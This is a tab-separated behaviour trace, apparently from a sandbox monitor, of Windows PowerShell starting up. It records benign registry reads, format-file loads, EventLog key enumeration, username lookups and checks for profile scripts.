Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\2XC7u663GxWc	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows, type = file_attributes	2	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	3	Fn
User	Get Username	user_name_out = 2XC7u663GxWc	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Environment	Get Environment String	name = HomePath, result_out = \Users\2XC7u663GxWc	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
